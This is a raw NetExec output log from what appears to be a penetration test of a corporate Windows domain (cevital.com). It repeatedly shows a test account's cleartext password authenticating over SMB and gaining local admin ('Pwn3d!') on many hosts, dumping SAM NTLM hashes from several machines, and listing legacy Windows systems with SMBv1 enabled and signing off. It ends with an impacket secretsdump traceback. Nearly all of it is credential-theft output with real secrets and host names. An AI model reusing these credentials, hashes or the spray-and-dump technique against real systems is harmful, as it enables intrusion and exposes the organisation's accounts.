oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
SMB 10.34.160.120 445 OXODT020116 [*] Dumping SAM hashes
SMB 10.34.160.135 445 OXOLT020057 [+] Cevital.com\
oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
SMB 10.34.160.59 445 OXODT020127 [+] Cevital.com\
oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
SMB 10.34.160.120 445 OXODT020116
rootoxxo:500:aad3b435b51404eeaad3b435b51404ee:8d34de2a96b2d9c4a89478af030d136a:::
[03:24:29] ERROR DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
smb.py:1518

ERROR DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
smb.py:1518

SMB 10.34.162.4 445 4005073-001 [*] Windows 7 Ultimate 7601


Service Pack 1 x32 (name:4005073-001) (domain:4005073-001) (signing:False)
(SMBv1:True)
SMB 10.34.162.1 445 4004794-001 [*] Windows 7 Ultimate 7601
Service Pack 1 x32 (name:4004794-001) (domain:4004794-001) (signing:False)
(SMBv1:True)
SMB 10.34.162.7 445 4005074-001 [*] Windows 7 Ultimate 7601
Service Pack 1 x32 (name:4005074-001) (domain:4005074-001) (signing:False)
(SMBv1:True)
SMB 10.34.162.5 445 4004832-002 [*] Windows 7 Ultimate 7601
Service Pack 1 x32 (name:4004832-002) (domain:4004832-002) (signing:False)
(SMBv1:True)
SMB 10.34.162.2 445 4004353-007 [*] Windows 7 Ultimate 7601
Service Pack 1 x32 (name:4004353-007) (domain:4004353-007) (signing:False)
(SMBv1:True)
SMB 10.34.160.120 445 OXODT020116
Invité:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB 10.34.162.6 445 4004832-001 [*] Windows 7 Ultimate 7601
Service Pack 1 x32 (name:4004832-001) (domain:4004832-001) (signing:False)
(SMBv1:True)
SMB 10.34.162.3 445 4004353-001 [*] Windows 7 Ultimate 7601
Service Pack 1 x32 (name:4004353-001) (domain:4004353-001) (signing:False)
(SMBv1:True)
SMB 10.34.162.8 445 4004795-001 [*] Windows 7 Ultimate 7601
Service Pack 1 x32 (name:4004795-001) (domain:4004795-001) (signing:False)
(SMBv1:True)
SMB 10.34.160.24 445 OXODT020088 [*] Dumping SAM hashes
SMB 10.34.160.106 445 OXODT02070004 [+] Cevital.com\
oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
SMB 10.34.160.120 445 OXODT020116
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c
0:::
SMB 10.34.160.135 445 OXOLT020057 [*] Dumping SAM hashes
SMB 10.34.160.25 445 OXODT02090005 [+] Cevital.com\
oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
SMB 10.34.160.120 445 OXODT020116
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:a091f8d5df27afd1218cad5878e
6c044:::
SMB 10.34.160.120 445 OXODT020116 [+] Added 4 SAM hashes to the
database
SMB 10.34.160.207 445 NONE [+] \oxxo_pentest:p8Z49-#MX6?
ki@ (Guest)
SMB 10.34.160.24 445 OXODT020088
rootoxxo:500:aad3b435b51404eeaad3b435b51404ee:8d34de2a96b2d9c4a89478af030d136a:::
SMB 10.34.160.59 445 OXODT020127 [*] Dumping SAM hashes
SMB 10.34.160.24 445 OXODT020088
Invité:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB 10.34.160.135 445 OXOLT020057
rootoxxo:500:aad3b435b51404eeaad3b435b51404ee:8d34de2a96b2d9c4a89478af030d136a:::
SMB 10.34.160.39 445 OXODT020079 [+] Cevital.com\
oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
SMB 10.34.160.135 445 OXOLT020057
Invité:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB 10.34.160.24 445 OXODT020088
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c
0:::
SMB 10.34.160.106 445 OXODT02070004 [*] Dumping SAM hashes
SMB 10.34.160.59 445 OXODT020127
rootoxxo:500:aad3b435b51404eeaad3b435b51404ee:8d34de2a96b2d9c4a89478af030d136a:::
SMB 10.34.160.135 445 OXOLT020057
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c
0:::
SMB 10.34.160.24 445 OXODT020088
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:a091f8d5df27afd1218cad5878e
6c044:::
SMB 10.34.160.24 445 OXODT020088 [+] Added 4 SAM hashes to the
database
SMB 10.34.160.110 445 OXODT020011 [+] Cevital.com\
oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
SMB 10.34.160.59 445 OXODT020127
Invité:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB 10.34.160.135 445 OXOLT020057
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:a091f8d5df27afd1218cad5878e
6c044:::
SMB 10.34.160.135 445 OXOLT020057 [+] Added 4 SAM hashes to the
database
SMB 10.34.160.106 445 OXODT02070004
rootoxxo:500:aad3b435b51404eeaad3b435b51404ee:8d34de2a96b2d9c4a89478af030d136a:::
SMB 10.34.160.59 445 OXODT020127
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c
0:::
SMB 10.34.160.45 445 OXODT020047 [+] Cevital.com\
oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
SMB 10.34.160.39 445 OXODT020079 [*] Dumping SAM hashes
SMB 10.34.160.106 445 OXODT02070004
Invité:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[03:24:33] ERROR DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
smb.py:1518

SMB 10.34.160.59 445 OXODT020127


WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:a091f8d5df27afd1218cad5878e
6c044:::
SMB 10.34.160.59 445 OXODT020127 [+] Added 4 SAM hashes to the
database
SMB 10.34.160.106 445 OXODT02070004
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c
0:::
SMB 10.34.160.110 445 OXODT020011 [*] Dumping SAM hashes
SMB 10.34.160.136 445 OXODT020004 [+] Cevital.com\
oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
SMB 10.34.160.106 445 OXODT02070004
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:a091f8d5df27afd1218cad5878e
6c044:::
SMB 10.34.160.106 445 OXODT02070004 [+] Added 4 SAM hashes to the
database
SMB 10.34.160.39 445 OXODT020079
rootoxxo:500:aad3b435b51404eeaad3b435b51404ee:8d34de2a96b2d9c4a89478af030d136a:::
SMB 10.34.160.39 445 OXODT020079
Invité:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB 10.34.160.110 445 OXODT020011
rootoxxo:500:aad3b435b51404eeaad3b435b51404ee:8d34de2a96b2d9c4a89478af030d136a:::
SMB 10.34.160.110 445 OXODT020011
Invité:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB 10.34.160.39 445 OXODT020079
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c
0:::
SMB 10.34.163.253 445 OXBBALSCSRV01 [*] Unix (name:OXBBALSCSRV01)
(domain:cevital.com) (signing:False) (SMBv1:True)
SMB 10.34.160.110 445 OXODT020011
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c
0:::
SMB 10.34.160.39 445 OXODT020079
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:a091f8d5df27afd1218cad5878e
6c044:::
SMB 10.34.160.39 445 OXODT020079 [+] Added 4 SAM hashes to the
database
SMB 10.34.160.110 445 OXODT020011
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:a091f8d5df27afd1218cad5878e
6c044:::
SMB 10.34.160.110 445 OXODT020011 [+] Added 4 SAM hashes to the
database
SMB 10.34.160.23 445 CEVLAP2116 [+] Cevital.com\
oxxo_pentest:p8Z49-#MX6?ki@
[03:24:36] ERROR DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
smb.py:1518

SMB 10.34.160.146 445 OXOLT020059 [+] Cevital.com\


oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
SMB 10.34.160.136 445 OXODT020004 [*] Dumping SAM hashes
SMB 10.34.160.80 445 OXODT020030 [+] Cevital.com\
oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
SMB 10.34.160.136 445 OXODT020004
rootoxxo:500:aad3b435b51404eeaad3b435b51404ee:8d34de2a96b2d9c4a89478af030d136a:::
SMB 10.34.160.136 445 OXODT020004
Invité:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB 10.34.160.136 445 OXODT020004
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c
0:::
SMB 10.34.160.136 445 OXODT020004
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:a091f8d5df27afd1218cad5878e
6c044:::
SMB 10.34.160.136 445 OXODT020004 [+] Added 4 SAM hashes to the
database
SMB 10.34.163.1 445 L2-MLR [*] Windows 7 Professional 7601
Service Pack 1 x64 (name:L2-MLR) (domain:L2-MLR) (signing:False) (SMBv1:True)
SMB 10.34.163.6 445 L2-SV800-232 [*] Windows 5.1 x32 (name:L2-
SV800-232) (domain:L2-SV800-232) (signing:False) (SMBv1:True)
SMB 10.34.163.28 445 L2-SSK-003 [*] Windows 5.1 x32 (name:L2-
SSK-003) (domain:L2-SSK-003) (signing:False) (SMBv1:True)
SMB 10.34.163.26 445 L1-SERVER-PC [*] Windows 7 Professional 7601
Service Pack 1 x64 (name:L1-SERVER-PC) (domain:L1-Server-Pc) (signing:False)
(SMBv1:True)
SMB 10.34.160.113 445 OXODT020031 [+] Cevital.com\
oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
SMB 10.34.160.127 445 OXODT020142 [+] Cevital.com\
oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
SMB 10.34.163.34 445 L3-MLR [*] Windows 7 Professional 7601
Service Pack 1 x64 (name:L3-MLR) (domain:L3-MLR) (signing:False) (SMBv1:True)
SMB 10.34.163.48 445 L3-SERVER-PC [*] Windows 7 Professional 7601
Service Pack 1 x64 (name:L3-SERVER-PC) (domain:L3-SERVER-PC) (signing:False)
(SMBv1:True)
SMB 10.34.163.45 445 L3-VPA1084-2 [*] Windows 7 Professional 7601
Service Pack 1 x64 (name:L3-VPA1084-2) (domain:L3-VPA1084-2) (signing:False)
(SMBv1:True)
SMB 10.34.163.55 445 L4-SERVER-PC [*] Windows 7 Professional 7601
Service Pack 1 x64 (name:L4-SERVER-PC) (domain:L4-SERVER-PC) (signing:False)
(SMBv1:True)
SMB 10.34.161.1 445 OXODT02030007 [+] Cevital.com\
oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
SMB 10.34.163.80 445 L1-MLR [*] Windows 7 Professional 7601
Service Pack 1 x64 (name:L1-MLR) (domain:L1-MLR) (signing:False) (SMBv1:True)
[03:24:38] ERROR DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
smb.py:1518

[03:24:39] ERROR DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied


smb.py:1518

SMB 10.34.163.31 445 L2-SERVER-PC [*] Windows 7 Professional 7601


Service Pack 1 x64 (name:L2-SERVER-PC) (domain:L2-SERVER-PC) (signing:False)
(SMBv1:True)
SMB 10.34.160.113 445 OXODT020031 [*] Dumping SAM hashes
SMB 10.34.160.61 445 OXOLT020024 [+] Cevital.com\
oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
SMB 10.34.160.70 445 OXODT020010 [+] Cevital.com\
oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
SMB 10.34.160.113 445 OXODT020031
rootoxxo:500:aad3b435b51404eeaad3b435b51404ee:8d34de2a96b2d9c4a89478af030d136a:::
[03:24:40] ERROR DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
smb.py:1518
SMB 10.34.160.113 445 OXODT020031
Invité:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB 10.34.160.113 445 OXODT020031
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c
0:::
SMB 10.34.160.122 445 OXODT02090006 [+] Cevital.com\
oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
ERROR DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
smb.py:1518

SMB 10.34.160.113 445 OXODT020031


WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:a091f8d5df27afd1218cad5878e
6c044:::
SMB 10.34.160.113 445 OXODT020031 [+] Added 4 SAM hashes to the
database
SMB 10.34.160.132 445 OXODT020065 [+] Cevital.com\
oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
[03:24:41] ERROR DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
smb.py:1518

SMB 10.34.160.70 445 OXODT020010 [*] Dumping SAM hashes


SMB 10.34.160.54 445 OXODT020087 [+] Cevital.com\
oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
SMB 10.34.160.70 445 OXODT020010
rootoxxo:500:aad3b435b51404eeaad3b435b51404ee:8d34de2a96b2d9c4a89478af030d136a:::
SMB 10.34.163.196 445 L-2090093059 [*] Windows Embedded Standard
7601 Service Pack 1 x32 (name:L-2090093059) (domain:L-2090093059) (signing:False)
(SMBv1:True)
SMB 10.34.163.197 445 L-2244778003 [*] Windows Embedded Standard
7601 Service Pack 1 x32 (name:L-2244778003) (domain:L-2244778003) (signing:False)
(SMBv1:True)
SMB 10.34.160.97 445 OXODT020097 [+] Cevital.com\
oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
SMB 10.34.160.70 445 OXODT020010
Invité:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB 10.34.163.206 445 L-2100577031 [*] Windows Embedded Standard
7601 Service Pack 1 x32 (name:L-2100577031) (domain:L-2100577031) (signing:False)
(SMBv1:True)
SMB 10.34.163.202 445 L-2100577026 [*] Windows Embedded Standard
7601 Service Pack 1 x32 (name:L-2100577026) (domain:L-2100577026) (signing:False)
(SMBv1:True)
SMB 10.34.163.203 445 L-2100577021 [*] Windows Embedded Standard
7601 Service Pack 1 x32 (name:L-2100577021) (domain:L-2100577021) (signing:False)
(SMBv1:True)
SMB 10.34.163.210 445 L-2100577018 [*] Windows Embedded Standard
7601 Service Pack 1 x32 (name:L-2100577018) (domain:L-2100577018) (signing:False)
(SMBv1:True)
SMB 10.34.163.209 445 L-2100577015 [*] Windows Embedded Standard
7601 Service Pack 1 x32 (name:L-2100577015) (domain:L-2100577015) (signing:False)
(SMBv1:True)
SMB 10.34.160.70 445 OXODT020010
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c
0:::
SMB 10.34.161.9 445 OXODT02100006 [+] Cevital.com\
oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
SMB 10.34.160.70 445 OXODT020010
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:a091f8d5df27afd1218cad5878e
6c044:::
SMB 10.34.160.70 445 OXODT020010 [+] Added 4 SAM hashes to the
database
SMB 10.34.160.54 445 OXODT020087 [*] Dumping SAM hashes
SMB 10.34.163.221 445 L-2244778007 [*] Windows Embedded Standard
7601 Service Pack 1 x32 (name:L-2244778007) (domain:L-2244778007) (signing:False)
(SMBv1:True)
SMB 10.34.161.2 445 OXODT02030003 [+] Cevital.com\
oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
SMB 10.34.163.224 445 L-2090093031 [*] Windows Embedded Standard
7601 Service Pack 1 x32 (name:L-2090093031) (domain:L-2090093031) (signing:False)
(SMBv1:True)
SMB 10.34.163.225 445 L-2090093021 [*] Windows Embedded Standard
7601 Service Pack 1 x32 (name:L-2090093021) (domain:L-2090093021) (signing:False)
(SMBv1:True)
SMB 10.34.163.228 445 L-2090093035 [*] Windows Embedded Standard
7601 Service Pack 1 x32 (name:L-2090093035) (domain:L-2090093035) (signing:False)
(SMBv1:True)
SMB 10.34.160.54 445 OXODT020087
rootoxxo:500:aad3b435b51404eeaad3b435b51404ee:8d34de2a96b2d9c4a89478af030d136a:::
[03:24:44] ERROR DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
smb.py:1518

ERROR DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
smb.py:1518
SMB 10.34.160.154 445 OXOLT020010 [+] Cevital.com\
oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
SMB 10.34.160.54 445 OXODT020087
Invité:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB 10.34.163.235 445 SOSO-PC [*] Windows 7 Ultimate 7601
Service Pack 1 x64 (name:SOSO-PC) (domain:soso-PC) (signing:False) (SMBv1:True)
SMB 10.34.163.239 445 SOSO-PC [*] Windows 10 / Server 2016
Build 16299 x64 (name:SOSO-PC) (domain:soso-PC) (signing:False) (SMBv1:False)
SMB 10.34.160.54 445 OXODT020087
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c
0:::
SMB 10.34.161.8 445 OXODT02050012 [+] Cevital.com\
oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
SMB 10.34.164.33 445 OXXKASTOSL01 [*] Windows Server 2008 R2
Standard 7601 Service Pack 1 x64 (name:OXXKASTOSL01) (domain:OXXKASTOSL01)
(signing:False) (SMBv1:True)
[03:24:46] ERROR DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
smb.py:1518
ERROR DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
smb.py:1518
SMB 10.34.160.54 445 OXODT020087
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:a091f8d5df27afd1218cad5878e
6c044:::
SMB 10.34.161.13 445 OXODT020022 [+] Cevital.com\
oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
SMB 10.34.160.54 445 OXODT020087 [+] Added 4 SAM hashes to the
database
[03:24:47] ERROR DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
smb.py:1518
SMB 10.34.160.92 445 OXODT020225 [-] Connection Error: [Errno
104] Connection reset by peer
SMB 10.34.160.18 445 OXODT020113 [-] Connection Error: [Errno
104] Connection reset by peer
SMB 10.34.160.49 445 NONE [+] \oxxo_pentest:p8Z49-#MX6?
ki@ (Guest)
SMB 10.34.160.139 445 OXODT020151 [-] Connection Error: [Errno
104] Connection reset by peer
SMB 10.34.161.11 445 OXODT02030005 [+] Cevital.com\
oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
[03:24:48] ERROR DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
smb.py:1518
SMB 10.34.161.3 445 OXODT02060001 [-] Connection Error: [Errno
104] Connection reset by peer
SMB 10.34.161.4 445 OXODT02060004 [-] Connection Error: [Errno
104] Connection reset by peer
SMB 10.34.160.142 445 OXODT020077 [-] Connection Error: [Errno
104] Connection reset by peer
SMB 10.34.160.133 445 OXOLT020048 [-] Connection Error: [Errno
104] Connection reset by peer
SMB 10.34.160.33 445 OXODT020019 [-] Connection Error: [Errno
104] Connection reset by peer
SMB 10.34.161.12 445 OXODT02030010 [-] Connection Error: [Errno
104] Connection reset by peer
SMB 10.34.160.123 445 OXODT020227 [+] Cevital.com\
oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
[03:24:49] ERROR DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
smb.py:1518
SMB 10.34.160.63 445 OXODT020037 [+] Cevital.com\
oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
SMB 10.34.160.100 445 OXOLT020007 [-] Connection Error: [Errno
104] Connection reset by peer
SMB 10.34.160.76 445 OXODT020146 [-] Connection Error: [Errno
104] Connection reset by peer
SMB 10.34.160.53 445 OXOLT020058 [-] Connection Error: [Errno
104] Connection reset by peer
SMB 10.34.160.94 445 OXOLT020023 [-] Connection Error: [Errno
104] Connection reset by peer
SMB 10.34.160.108 445 OXODT020108 [-] Connection Error: [Errno
104] Connection reset by peer
SMB 10.34.160.36 445 OXOLT020043 [-] Connection Error: [Errno
104] Connection reset by peer
SMB 10.34.160.134 445 OXODT020115 [-] Connection Error: [Errno
104] Connection reset by peer
SMB 10.34.160.114 445 OXODT020135 [-] Connection Error: [Errno
104] Connection reset by peer
SMB 10.34.164.131 445 HPCZJ5240FXG [*] (name:HPCZJ5240FXG)
(domain:HPCZJ5240FXG) (signing:False) (SMBv1:False)
SMB 10.34.164.138 445 OXXNSRV2001 [*] Unix - Samba
(name:OXXNSRV2001) (domain:OXXNSRV2001) (signing:False) (SMBv1:True)
SMB 10.34.160.98 445 OXODT020021 [+] Cevital.com\
oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
SMB 10.34.164.133 445 OXXONSRV1000 [*] Unix - Samba
(name:OXXONSRV1000) (domain:OXXONSRV1000) (signing:False) (SMBv1:True)
[03:24:50] ERROR DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
smb.py:1518
ERROR DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
smb.py:1518
SMB 10.34.164.133 445 OXXONSRV1000 [+] OXXONSRV1000\
oxxo_pentest:p8Z49-#MX6?ki@
SMB 10.34.160.14 445 OXODT020156 [-] Connection Error: [Errno
104] Connection reset by peer
ERROR DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
smb.py:1518
SMB 10.34.161.5 445 OXODT02060010 [-] Connection Error: [Errno
104] Connection reset by peer
SMB 10.34.160.149 445 OXODT020149 [-] Connection Error: [Errno
104] Connection reset by peer
SMB 10.34.160.31 445 OXODT020091 [-] Connection Error: [Errno
104] Connection reset by peer
SMB 10.34.160.143 445 OXOLT020041 [-] Connection Error: [Errno
104] Connection reset by peer
SMB 10.34.161.6 445 OXODT02040010 [-] Connection Error: [Errno
104] Connection reset by peer
SMB 10.34.160.48 445 OXODT020104 [-] Connection Error: [Errno
104] Connection reset by peer
SMB 10.34.160.128 445 OXODT020063 [-] Connection Error: [Errno
104] Connection reset by peer
SMB 10.34.160.67 445 OXODT020141 [-] Connection Error: [Errno
104] Connection reset by peer
SMB 10.34.160.125 445 OXODT020007 [-] Connection Error: [Errno
104] Connection reset by peer
SMB 10.34.160.19 445 OXODT020042 [-] Connection Error: [Errno
104] Connection reset by peer
SMB 10.34.160.112 445 OXODT020226 [-] Connection Error: [Errno
104] Connection reset by peer
[03:24:52] ERROR DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
smb.py:1518
SMB 10.34.160.42 445 OXODT020006 [+] Cevital.com\
oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
SMB 10.34.160.150 445 OXODT020101 [-] Connection Error: [Errno
104] Connection reset by peer
SMB 10.34.160.84 445 OXOLT020030 [-] Connection Error: [Errno
104] Connection reset by peer
SMB 10.34.160.111 445 OXODT020099 [-] Connection Error: [Errno
104] Connection reset by peer
SMB 10.34.160.144 445 OXOLT020004 [-] Connection Error: [Errno
104] Connection reset by peer
SMB 10.34.160.102 445 OXOLT020019 [-] Connection Error: [Errno
104] Connection reset by peer
SMB 10.34.160.12 445 OXODT020086 [-] Connection Error: [Errno
104] Connection reset by peer
SMB 10.34.160.66 445 OXODT020020 [-] Connection Error: [Errno
104] Connection reset by peer
SMB 10.34.160.115 445 OXODT020114 [-] Connection Error: [Errno
104] Connection reset by peer
SMB 10.34.160.26 445 OXODT020070 [-] Connection Error: [Errno
104] Connection reset by peer
SMB 10.34.160.77 445 OXOLT020027 [-] Connection Error: [Errno
104] Connection reset by peer
SMB 10.34.160.141 445 OXODT020105 [-] Connection Error: [Errno
104] Connection reset by peer
SMB 10.34.161.10 445 OXODT02010001 [-] Connection Error: [Errno
104] Connection reset by peer
SMB 10.34.160.58 445 OXOLT020033 [-] Connection Error: [Errno
104] Connection reset by peer
SMB 10.34.160.213 445 NONE [+] \oxxo_pentest:p8Z49-#MX6?
ki@ (Guest)
SMB 10.34.161.15 445 OXODT02060051 [-] Connection Error: [Errno
104] Connection reset by peer
SMB 10.34.161.17 445 OXODT02040004 [-] Connection Error: [Errno
104] Connection reset by peer
SMB 10.34.161.24 445 OXODT02070011 [-] Connection Error: [Errno
104] Connection reset by peer
SMB 10.34.161.20 445 OXODT02060005 [-] Connection Error: [Errno
104] Connection reset by peer
SMB 10.34.161.18 445 OXODT02030008 [-] Connection Error: [Errno
104] Connection reset by peer
SMB 10.34.161.14 445 OXODT02070005 [-] Connection Error: [Errno
104] Connection reset by peer
SMB 10.34.161.19 445 OXODT02070021 [-] Connection Error: [Errno
104] Connection reset by peer
SMB 10.34.161.22 445 OXODT02020002 [-] Connection Error: [Errno
104] Connection reset by peer
SMB 10.34.160.56 445 OXOASP02007 [-] Connection Error: [Errno
104] Connection reset by peer
SMB 10.34.161.29 445 OXODT02020001 [-] Connection Error: [Errno
104] Connection reset by peer
SMB 10.34.161.37 445 OXODT02020004 [-] Connection Error: [Errno
104] Connection reset by peer
SMB 10.34.160.16 445 OXODT020118 [-] Connection Error: [Errno
104] Connection reset by peer
SMB 10.34.161.28 445 OXODT02040007 [-] Connection Error: [Errno
104] Connection reset by peer
SMB 10.34.161.40 445 OXODT02040006 [-] Connection Error: [Errno
104] Connection reset by peer
SMB 10.34.161.30 445 OXODT02020005 [-] Connection Error: [Errno
104] Connection reset by peer
SMB 10.34.162.129 445 OXOASP02004 [+] Cevital.com\
oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
ERROR DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied smb.py:1518
╭──────────────────── Traceback (most recent call last) ────────────────────╮
│ /usr/lib/python3/dist-packages/nxc/protocols/smb.py:1496 in sam
│
│   1493 │ │ │ add_sam_hash.sam_hashes = 0
│   1494 │ │ │
│   1495 │ │ │ if self.remote_ops and self.bootkey:
│ ❱ 1496 │ │ │ │ SAM_file_name = self.remote_ops.saveSAM()
│   1497 │ │ │ │ SAM = SAMHashes(
│   1498 │ │ │ │ │ SAM_file_name,
│   1499 │ │ │ │ │ self.bootkey,
│
│ /usr/lib/python3/dist-packages/impacket/examples/secretsdump.py:934 in saveSAM
│
│   931 │
│   932 │ def saveSAM(self):
│   933 │ │ LOG.debug('Saving remote SAM database')
│ ❱ 934 │ │ return self.__retrieveHive('SAM')
│   935 │
│   936 │ def saveSECURITY(self):
│   937 │ │ LOG.debug('Saving remote SECURITY database')
│
│ /usr/lib/python3/dist-packages/impacket/examples/secretsdump.py:925 in __retrieveHive
│
│   922 │ │ except:
│   923 │ │ │ raise Exception("Can't open %s hive" % hiveName)
│   924 │ │ keyHandle = ans['phkResult']
│ ❱ 925 │ │ rrp.hBaseRegSaveKey(self.__rrp, keyHandle, '..\\Temp\\'+tmpFileName)
│   926 │ │ rrp.hBaseRegCloseKey(self.__rrp, keyHandle)
│   927 │ │ rrp.hBaseRegCloseKey(self.__rrp, regHandle)
│   928 │ │ # Now let's open the remote file, so it can be read later
│
│ /usr/lib/python3/dist-packages/impacket/dcerpc/v5/rrp.py:946 in hBaseRegSaveKey
│
│   943 │ request['hKey'] = hKey
│   944 │ request['lpFile'] = checkNullString(lpFile)
│   945 │ request['pSecurityAttributes'] = pSecurityAttributes
│ ❱ 946 │ return dce.request(request)
│   947
│   948 def hBaseRegSetValue(dce, hKey, lpValueName, dwType, lpData):
│   949 │ request = BaseRegSetValue()
│
│ /usr/lib/python3/dist-packages/impacket/dcerpc/v5/rpcrt.py:882 in request
│
│   879 │ │ │ │ │ exception = sessionErrorClass(error_code = error_code)
│   880 │ │ │ │ else:
│   881 │ │ │ │ │ exception = sessionErrorClass(packet = response, error_code = error_code)
│ ❱ 882 │ │ │ raise exception
│   883 │ │ else:
│   884 │ │ │ response = respClass(answer, isNDR64 = isNDR64)
│   885 │ │ │ return response
╰───────────────────────────────────────────────────────────────────────────╯
DCERPCException: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied

SMB 10.34.160.109 445 AKS160001 [-] AKS160001\
oxxo_pentest:p8Z49-#MX6?ki@ STATUS_LOGON_FAILURE
SMB 10.34.162.132 445 OXXVSRV2000 [+] Cevital.com\
oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
SMB 10.34.162.129 445 OXOASP02004 [*] Dumping SAM hashes
SMB 10.34.162.131 445 OXXSDC0202 [+] Cevital.com\
oxxo_pentest:p8Z49-#MX6?ki@
SMB 10.34.162.132 445 OXXVSRV2000 [*] Dumping SAM hashes
[03:24:53] ERROR DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
smb.py:1518
SMB 10.34.160.89 445 INTERHM [-] interhm\oxxo_pentest:p8Z49-
#MX6?ki@ STATUS_LOGON_FAILURE
SMB 10.34.165.7 445 CUMAX3 [*] Windows Embedded Standard
7600 x32 (name:CUMAX3) (domain:CUMAX3) (signing:False) (SMBv1:True)
